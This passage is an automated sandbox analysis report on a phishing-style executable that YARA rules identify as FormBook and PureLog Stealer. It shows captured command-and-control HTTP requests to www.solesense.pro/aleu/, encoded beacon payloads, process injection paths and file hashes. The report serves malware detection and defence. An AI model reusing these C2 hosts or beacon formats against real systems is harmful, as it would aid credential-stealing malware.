                                                                                                                                                                          Data Ascii: .65 65.893 5.65s6.127 1.16 6.127 6.707zm-1.848 0c0-3.48-1.27-5.004-4.242-5.004-2.936 0-4.205 1.523-4.205 5.004 0 3.48 1.27 5.003 4.205 5.003 2.937 0 4.242-1.523 4.242-5.003zM25.362 5.65c-5.91 0-5.693 5.51-5.693 6.888 0 5.402 3.226 6.526 5.945
                                                                                                                                                                          Apr 26, 2024 07:44:32.478116035 CEST1289INData Raw: 2e 37 32 20 30 2d 35 2e 39 34 36 20 31 2e 31 36 2d 35 2e 39 34 36 20 36 2e 35 36 33 20 30 20 35 2e 39 38 32 20 33 2e 35 39 20 36 2e 38 39 20 35 2e 37 32 38 20 36 2e 38 39 20 34 2e 39 33 20 30 20 35 2e 32 39 34 2d 33 2e 31 35 35 20 35 2e 32 39 34
                                                                                                                                                                          Data Ascii: .72 0-5.946 1.16-5.946 6.563 0 5.982 3.59 6.89 5.728 6.89 4.93 0 5.294-3.155 5.294-4.098V.9h-1.886z" fill="#FFF"></path> </svg> </span> </a></div></div><section class="cb cb-dark" id="cookiebar" style="display:none;"


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          41192.168.2.74976791.195.240.19802912C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Apr 26, 2024 07:44:47.472965002 CEST753OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.solesense.pro
                                                                                                                                                                          Origin: http://www.solesense.pro
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 220
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.solesense.pro/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Raw: 4d 7a 59 44 6b 6c 66 3d 49 75 4d 65 2b 69 46 74 44 5a 45 6e 68 4d 36 50 69 42 77 36 4c 49 71 57 48 6e 55 36 70 51 75 61 68 4a 4b 33 42 49 46 6a 77 77 41 56 72 72 72 52 49 2b 6b 71 66 6e 75 63 36 51 76 51 4b 58 4e 43 67 54 4b 70 70 69 53 47 75 45 39 4e 6c 36 61 72 46 55 47 55 53 45 51 52 52 65 4e 4f 54 54 63 77 62 39 37 4f 78 6a 6b 77 62 39 7a 41 74 58 6f 50 71 59 63 66 51 70 79 67 4d 58 62 31 70 77 69 54 57 50 55 57 71 67 46 61 75 4f 33 52 78 6a 31 34 6a 4a 38 62 2b 32 39 38 54 61 31 59 36 58 75 64 6d 67 4a 70 45 38 33 51 68 6d 31 4e 6c 2f 52 74 33 41 63 57 38 72 44 63 52 61 30 6c 70 36 4f 6c 68 31 55 7a 69 5a 62 73 6d 6d 61 52 50 58 63 31 33 41 3d 3d
                                                                                                                                                                          Data Ascii: MzYDklf=IuMe+iFtDZEnhM6PiBw6LIqWHnU6pQuahJK3BIFjwwAVrrrRI+kqfnuc6QvQKXNCgTKppiSGuE9Nl6arFUGUSEQRReNOTTcwb97Oxjkwb9zAtXoPqYcfQpygMXb1pwiTWPUWqgFauO3Rxj14jJ8b+298Ta1Y6XudmgJpE83Qhm1Nl/Rt3AcW8rDcRa0lp6Olh1UziZbsmmaRPXc13A==
                                                                                                                                                                          Apr 26, 2024 07:44:47.716365099 CEST208INHTTP/1.1 403 Forbidden
                                                                                                                                                                          content-length: 93
                                                                                                                                                                          cache-control: no-cache
                                                                                                                                                                          content-type: text/html
                                                                                                                                                                          connection: close
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                          Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          42192.168.2.74976891.195.240.19802912C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Apr 26, 2024 07:44:50.273463964 CEST773OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.solesense.pro
                                                                                                                                                                          Origin: http://www.solesense.pro
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 240
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.solesense.pro/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Raw: 4d 7a 59 44 6b 6c 66 3d 49 75 4d 65 2b 69 46 74 44 5a 45 6e 7a 38 4b 50 68 68 4d 36 61 34 71 56 43 6e 55 36 77 41 75 65 68 4a 47 33 42 4a 42 7a 77 44 6b 56 71 4c 37 52 4a 36 51 71 4b 6e 75 63 79 77 75 62 55 6e 4e 4a 67 54 47 62 70 6a 2b 47 75 48 42 4e 6c 36 4b 72 47 6a 71 58 53 55 51 54 61 2b 4e 4d 65 7a 63 77 62 39 37 4f 78 6e 49 61 62 39 62 41 74 47 34 50 6f 39 6f 59 64 4a 79 68 4c 58 62 31 34 41 69 58 57 50 55 6b 71 69 67 50 75 4e 50 52 78 6d 52 34 74 39 6f 55 6c 47 39 36 64 36 30 58 30 45 54 2f 6a 43 4a 4f 45 66 7a 56 75 56 70 30 6b 4a 4d 50 74 69 51 36 69 36 37 6e 56 59 51 54 2b 63 54 51 6a 30 51 72 76 37 76 4e 35 52 2f 37 43 46 39 78 68 77 4b 32 72 37 53 4c 49 4a 31 66 37 74 49 79 46 77 67 2f 30 6e 73 3d
                                                                                                                                                                          Data Ascii: MzYDklf=IuMe+iFtDZEnz8KPhhM6a4qVCnU6wAuehJG3BJBzwDkVqL7RJ6QqKnucywubUnNJgTGbpj+GuHBNl6KrGjqXSUQTa+NMezcwb97OxnIab9bAtG4Po9oYdJyhLXb14AiXWPUkqigPuNPRxmR4t9oUlG96d60X0ET/jCJOEfzVuVp0kJMPtiQ6i67nVYQT+cTQj0Qrv7vN5R/7CF9xhwK2r7SLIJ1f7tIyFwg/0ns=
                                                                                                                                                                          Apr 26, 2024 07:44:50.515738964 CEST208INHTTP/1.1 403 Forbidden
                                                                                                                                                                          content-length: 93
                                                                                                                                                                          cache-control: no-cache
                                                                                                                                                                          content-type: text/html
                                                                                                                                                                          connection: close
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                          Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          43192.168.2.74976991.195.240.19802912C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Apr 26, 2024 07:44:53.047148943 CEST1786OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.solesense.pro
                                                                                                                                                                          Origin: http://www.solesense.pro
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 1252
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.solesense.pro/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Raw: 4d 7a 59 44 6b 6c 66 3d 49 75 4d 65 2b 69 46 74 44 5a 45 6e 7a 38 4b 50 68 68 4d 36 61 34 71 56 43 6e 55 36 77 41 75 65 68 4a 47 33 42 4a 42 7a 77 44 73 56 72 34 44 52 49 64 4d 71 4d 58 75 63 75 67 75 59 55 6e 4e 75 67 54 65 66 70 6a 43 73 75 42 4e 4e 33 4d 47 72 52 69 71 58 59 55 51 54 48 75 4e 50 54 54 64 6f 62 39 4c 4b 78 6a 6f 61 62 39 62 41 74 46 77 50 68 49 63 59 4f 5a 79 67 4d 58 62 48 70 77 6a 43 57 4c 34 30 71 69 6c 30 75 38 76 52 79 47 42 34 67 6f 38 55 70 47 39 34 4e 71 31 49 30 45 66 4a 6a 43 46 43 45 63 76 2f 75 58 35 30 6b 4f 6f 54 32 68 68 74 32 73 54 44 63 4f 42 79 39 4d 62 32 74 33 67 4f 73 4d 43 32 6c 6a 44 4e 43 7a 46 2b 71 67 6d 79 32 49 43 50 44 34 42 4a 7a 74 74 63 59 46 49 67 31 79 76 47 4f 73 63 48 32 69 75 66 37 53 4e 37 38 5a 66 64 62 79 77 4c 70 41 6c 73 39 57 44 6e 62 76 4f 36 70 45 36 41 52 78 79 6c 33 4d 31 6c 4b 6d 43 43 2b 64 6b 52 38 51 4e 34 5a 47 64 5a 39 55 58 30 52 32 5a 41 4a 78 31 59 52 69 51 62 56 59 46 4f 34 41 4c 41 67 78 6d 4c 77 41 50 44 7a 61 31 31 55 51 76 6a 72 51 68 65 77 32 47 70 35 68 50 6d 79 36 4e 58 44 73 4b 44 79 4d 70 6e 6f 38 2b 79 39 77 6d 4b 49 35 58 55 66 35 69 56 36 43 70 77 33 4f 75 6c 6d 51 76 70 76 59 67 57 4c 33 49 76 43 4c 6c 31 59 45 70 35 64 5a 74 78 47 68 73 71 36 7a 69 6c 36 78 34 50 43 74 57 54 59 47 62 30 2f 70 31 6f 59 69 36 75 43 42 35 44 7a 37 37 64 77 71 49 42 6f 47 34 4d 47 47 31 50 39 64 52 38 55 65 6e 74 7a 38 54 45 47 2b 55 65 31 6d 4b 47 2b 2f 78 75 6b 57 54 34 51 44 65 6c 6c 71 5a 59 6c 2b 7a 49 57 71 69 36 50 39 2b 78 4e 57 6e 6a 64 44 2b 2b 41 35 78 65 74 69 32 32 6e 78 48 63 58 4d 68 48 48 51 76 77 6d 6c 72 6e 76 6c 6c 53 75 52 76 42 6f 4c 50 65 64 73 43 6c 68 49 38 68 79 61 6b 73 79 64 4b 63 65 7a 6e 4d 7a 66 5a 7a 52 6e 2b 6d 30 57 33 48 7a 30 4e 56 4d 61 39 61 79 4b 6a 4e 43 77 7a 2f 72 45 6c 54 45 65 6d 66 46 6f 7a 2b 6a 65 78 2f 4d 6c 43 74 68 6a 6f 47 4c 46 49 45 79 4a 77 4c 48 70 53 50 64 77 31 35 75 4c 6c 6a 57 71 30 4a 30 50 77 4c 72 69 7a 32 73 33 6d 67 73 2b 4f 43 43 6c 50 31 4c 39 38 43 53 55 52 76 50 38 5a 30 71 62 47 70 4b 4a 4f 4d 4a 58 38 58 70 61 31 34 64 6e 4c 46 58 45 7a 62 6c 43 35 37 55 4e 4d 31 66 4c 7a 5a 4b 2f 36 52 74 7a 79 34 38 73 64 51 55 50 37 54 48 43 30 56 61 2f 65 74 4a 34 64 76 52 4d 76 70 71 48 62 49 32 56 36 43 77 6a 74 57 50 70 58 2f 62 6e 41 2b 4f 47 35 2f 4a 53 52 6c 66 6f 32 2f 2b 55 63 59 52 45 4c 4c 50 79 51 7a 6a 31 4d 7a 66 72 6e 79 4f 4f 59 72 6d 64 75 69 39 68 34 4b 43 52 52 4a 67 79 43 51 51 67 79 2b 6d 51 55 75 67 31 4c 4f 4f 48 45 45 73 34 70 37 42 52 6a 67 48 35 73 49 6b 47 78 44 73 2b 78 53 78 6b 7a 6e 4f 70 5a 2f 75 69 73 4a 56 39 59 43 4e 32 38 61 6a 65 31 56 31 2f 6b 33 56 67 47 4c 4f 64 58 57 33 43 42 74 6d 45 35 63 38 30 63 48 34 76 67 39 4d 49 4c 6e 4e 57 70 36 7a 35 52 62 4b 72 42 4e 78 49 54 62 70 4d 44 49 51 53 66 56 47 57 31 77 6d 51 46 43 34 32 74 79 55 62 77 33 6a 6a 57 5a 37 4a 35 7a 2f 65 78 54 72 2f 59 4f 6e 38 43 59 59 4b 61 69 68 4c 2f 53 79 2b 34 35 75 65 57 57 4a 41 6f 76 47 65 61 71 48 70 56 45 64 4d 74 67 2f 73 4d 77 49 77 62 41 5a 4e 6a 76 74 61 6e 4b 44 58 5a 67 6c 72 35 4c 45 39 77 36 43 74 56 6a 71 73 58 67 4b 4c 76 34 52 4d 6e 53 47 56 36 4d 61 6a 79 37 66 4e 59 63 4e 4c 54 72 78 6b 62 76 5a 6c 6f 47 68 37 6c 64 62 4e 31 5a 4e 71 46 66 2b 38 66 57 4c 57 68 52 48 77 77 59 72 66 38 6c 68 78 47 66 36 67 6a 71 5a 33 50 45 57 75 35 4f 31 31 49 51 62 32 37 52 6c 53 44 6e 51 74 2f 56 62 55 74 53 48 2b 4f 73 62 55 43 69 7a 52 45 4a 64 32 42 35 52 4f 45 66 46 45 4d 58 6e 63 31 46 51 44 34 72 72 44 2f 47 67 36 2b 76 74 45 45 5a 56 32 4f 43 34 71 51 6e 51 37 52 2f 32 74 66 57 55 45 2b 49 4c 44 4c 2f 4b 79 6e 6c 62 50 50 6c 78 74 46 38 6c 43 72 41 6a 47 46 64 36 66 6d 5a 59 50 43 4a 76 71 73 59 31 70 68 72 30 62 52 50 6a 72 73 78 49 70 6f 63
                                                                                                                                                                          Data Ascii: MzYDklf=IuMe+iFtDZEnz8KPhhM6a4qVCnU6wAuehJG3BJBzwDsVr4DRIdMqMXucuguYUnNugTefpjCsuBNN3MGrRiqXYUQTHuNPTTdob9LKxjoab9bAtFwPhIcYOZygMXbHpwjCWL40qil0u8vRyGB4go8UpG94Nq1I0EfJjCFCEcv/uX50kOoT2hht2sTDcOBy9Mb2t3gOsMC2ljDNCzF+qgmy2ICPD4BJzttcYFIg1yvGOscH2iuf7SN78ZfdbywLpAls9WDnbvO6pE6ARxyl3M1lKmCC+dkR8QN4ZGdZ9UX0R2ZAJx1YRiQbVYFO4ALAgxmLwAPDza11UQvjrQhew2Gp5hPmy6NXDsKDyMpno8+y9wmKI5XUf5iV6Cpw3OulmQvpvYgWL3IvCLl1YEp5dZtxGhsq6zil6x4PCtWTYGb0/p1oYi6uCB5Dz77dwqIBoG4MGG1P9dR8Uentz8TEG+Ue1mKG+/xukWT4QDellqZYl+zIWqi6P9+xNWnjdD++A5xeti22nxHcXMhHHQvwmlrnvllSuRvBoLPedsClhI8hyaksydKceznMzfZzRn+m0W3Hz0NVMa9ayKjNCwz/rElTEemfFoz+jex/MlCthjoGLFIEyJwLHpSPdw15uLljWq0J0PwLriz2s3mgs+OCClP1L98CSURvP8Z0qbGpKJOMJX8Xpa14dnLFXEzblC57UNM1fLzZK/6Rtzy48sdQUP7THC0Va/etJ4dvRMvpqHbI2V6CwjtWPpX/bnA+OG5/JSRlfo2/+UcYRELLPyQzj1MzfrnyOOYrmdui9h4KCRRJgyCQQgy+mQUug1LOOHEEs4p7BRjgH5sIkGxDs+xSxkznOpZ/uisJV9YCN28aje1V1/k3VgGLOdXW3CBtmE5c80cH4vg9MILnNWp6z5RbKrBNxITbpMDIQSfVGW1wmQFC42tyUbw3jjWZ7J5z/exTr/YOn8CYYKaihL/Sy+45ueWWJAovGeaqHpVEdMtg/sMwIwbAZNjvtanKDXZglr5LE9w6CtVjqsXgKLv4RMnSGV6Majy7fNYcNLTrxkbvZloGh7ldbN1ZNqFf+8fWLWhRHwwYrf8lhxGf6gjqZ3PEWu5O11IQb27RlSDnQt/VbUtSH+OsbUCizREJd2B5ROEfFEMXnc1FQD4rrD/Gg6+vtEEZV2OC4qQnQ7R/2tfWUE+ILDL/KynlbPPlxtF8lCrAjGFd6fmZYPCJvqsY1phr0bRPjrsxIpoc
                                                                                                                                                                          Apr 26, 2024 07:44:53.289206028 CEST208INHTTP/1.1 403 Forbidden
                                                                                                                                                                          content-length: 93
                                                                                                                                                                          cache-control: no-cache
                                                                                                                                                                          content-type: text/html
                                                                                                                                                                          connection: close
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                          Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          44192.168.2.74977091.195.240.19802912C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Apr 26, 2024 07:44:57.056116104 CEST500OUTGET /aleu/?MzYDklf=Fsk+9Ugrf6MFs9mchnETM+3QD2cthhCQsqu2PahB1CBPiKPkA/hmNXSF9ivWSGs/4CiX0i2cy0l6l8SVSxzUF3Q4RMAPDGkyPIDahDw1KMSvyAVfpPYGa57LB1vixmbDZ7oyoAgNkZW7&PHaLL=ePmHKpKXdtoDqXh HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Host: www.solesense.pro
                                                                                                                                                                          Connection: close
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Apr 26, 2024 07:44:57.300765038 CEST208INHTTP/1.1 403 Forbidden
                                                                                                                                                                          content-length: 93
                                                                                                                                                                          cache-control: no-cache
                                                                                                                                                                          content-type: text/html
                                                                                                                                                                          connection: close
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                          Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                                          Statistics

                                                                                                                                                                          CPU Usage

                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          Memory Usage

                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                          Behavior

                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          System Behavior

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:0
                                                                                                                                                                          Start time:07:40:56
                                                                                                                                                                          Start date:26/04/2024
                                                                                                                                                                          Path:C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe"
                                                                                                                                                                          Imagebase:0xe70000
                                                                                                                                                                          File size:761'864 bytes
                                                                                                                                                                          MD5 hash:A20E41F9774504D4BACE9A2A8A7989C6
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1436066446.0000000004219000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1439477334.00000000091B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:3
                                                                                                                                                                          Start time:07:40:57
                                                                                                                                                                          Start date:26/04/2024
                                                                                                                                                                          Path:C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe"
                                                                                                                                                                          Imagebase:0x440000
                                                                                                                                                                          File size:761'864 bytes
                                                                                                                                                                          MD5 hash:A20E41F9774504D4BACE9A2A8A7989C6
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:4
                                                                                                                                                                          Start time:07:40:57
                                                                                                                                                                          Start date:26/04/2024
                                                                                                                                                                          Path:C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe"
                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                          File size:761'864 bytes
                                                                                                                                                                          MD5 hash:A20E41F9774504D4BACE9A2A8A7989C6
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1483242441.0000000000E40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1483242441.0000000000E40000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1482586968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1482586968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1485407481.0000000002790000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1485407481.0000000002790000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:7
                                                                                                                                                                          Start time:07:40:57
                                                                                                                                                                          Start date:26/04/2024
                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 1380
                                                                                                                                                                          Imagebase:0x140000
                                                                                                                                                                          File size:483'680 bytes
                                                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:20
                                                                                                                                                                          Start time:07:41:16
                                                                                                                                                                          Start date:26/04/2024
                                                                                                                                                                          Path:C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe"
                                                                                                                                                                          Imagebase:0x810000
                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.3683910951.0000000003AF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000014.00000002.3683910951.0000000003AF0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:21
                                                                                                                                                                          Start time:07:41:18
                                                                                                                                                                          Start date:26/04/2024
                                                                                                                                                                          Path:C:\Windows\SysWOW64\replace.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Windows\SysWOW64\replace.exe"
                                                                                                                                                                          Imagebase:0x610000
                                                                                                                                                                          File size:18'944 bytes
                                                                                                                                                                          MD5 hash:A7F2E9DD9DE1396B1250F413DA2F6C08
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.3676564826.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.3676564826.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.3683794972.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.3683794972.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.3683904439.0000000003020000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.3683904439.0000000003020000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:22
                                                                                                                                                                          Start time:08:45:09
                                                                                                                                                                          Start date:26/04/2024
                                                                                                                                                                          Path:C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe"
                                                                                                                                                                          Imagebase:0x810000
                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
